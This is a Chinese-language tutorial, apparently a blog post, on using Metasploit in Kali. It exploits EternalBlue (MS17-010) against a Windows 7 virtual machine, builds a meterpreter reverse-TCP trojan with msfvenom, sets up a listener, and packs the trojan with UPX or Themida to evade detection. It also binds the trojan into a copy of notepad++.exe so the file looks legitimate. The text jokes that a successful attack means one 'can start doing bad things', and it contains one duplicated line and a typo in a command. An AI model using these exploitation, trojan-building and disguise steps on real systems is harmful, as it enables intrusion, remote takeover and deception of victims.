kali—metasploit
metaspolit简介:
msf是一款开源安全漏洞利用和测试工具,继承了各种平台上常见的溢出漏洞和流行的shellcode,并继续保持更新。
- 首先终端提权:
sudo su
,输入密码,进入root权限。
- 打开msf:
msfconsole
,进入msf,注msf版本为 msf6。
采用msf对永恒之蓝漏洞进行扫描和利用:
**永恒之蓝漏洞简介:**2017年之前window系统基本上都存在永恒之蓝漏洞,下面采用msf进行永恒之蓝漏洞的扫描和利用。
search ms17_010
,针对永恒之蓝楼栋编号的应用,打开之后会看到以下模块。
- 使用模块两种方式:
use 0
或use + name (use exploit/windows/smb/ms17_010_eternalblue)
,进入模块之后进行设置窗口:show options
。
看到第一行的必选项(攻击目的的ip地址),还没有填写。接下来设置攻击目标的IP,这里需要一个window7的虚拟机。(msdn中下载相应镜像)。 - 查看靶机的ip地址:
ipconfig192.168.1.8
。并且关闭目标靶机的防火墙,使得kali能够ping通。
show options
来看必须要设置的选型。设置目标的ip地址,和端口号。
之后再次采用show options
来查看是否已经设置完毕。- 之后开始进行攻击
run
出现如下界面,攻击成功,可以开始干坏事了(退出:exit;后台运行:background)
msf生成远控制木马:
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。(msfvenom在shell里使用,不是msfconsole终端)
- windows可执行木马:
msfcenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -o demo.exe
成功生成木马文件
- 开启鱼钩监视。使用
use exploit/multi/handler
进行监听。
之后分别设置监听的payload
、lhost
、lport
。
run之后就开始等待鱼钩上钩。鱼儿上钩之后自动转换成meterpreter>
。
ps:木马包装两种方式。
- 使用upx file进行加壳,但是upx对文件的大小有限制,过小文件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。
件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。 - 使用可执行文件进行伪装,捆绑木马。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -x notepad++.exe -o notepad++.exe
。把木马文件捆绑到本来存在的x64文件notepad++.exe下。